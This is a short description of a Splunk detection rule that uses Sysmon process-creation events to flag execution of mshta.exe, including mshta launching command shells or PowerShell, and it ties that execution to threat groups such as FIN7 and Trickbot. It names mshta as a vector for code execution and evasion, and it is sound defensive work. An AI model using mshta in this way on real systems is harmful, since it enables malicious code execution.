This detection rule identifies the execution of the MSHTA.exe process on Windows systems. MSHTA (Microsoft HTML Application Host) is often exploited by various threat actors for malicious activities such as code execution and evasion techniques. The rule aggregates events associated with the MSHTA execution captured under Windows Sysmon. It uses specific filtering criteria in a Splunk query to match against event codes that signify process creation and is designed to capture not only direct invocations of mshta.exe but also instances where it may be used as a parent process for command shells or PowerShell scripts. By examining the process details and associating them with well-known threat actor groups like FIN7, Trickbot, and others, organizations can enhance their detection capabilities against tactics utilized in cyber-attacks. The rule is intended to enable security teams to respond to potential compromises where MSHTA is leveraged as a vector for executing malicious code or scripts.